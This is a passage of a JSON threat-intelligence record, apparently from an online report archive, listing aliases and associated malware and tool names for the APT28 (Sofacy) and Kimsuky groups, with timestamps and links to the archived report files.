				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434060,
	"ts_updated_at": 1775792269,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.pdf",
		"text": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.txt",
		"img": "https://archive.orkl.eu/ce1c9aed40cb251890cac05f24f7bff10ee03d94.jpg"
	}
}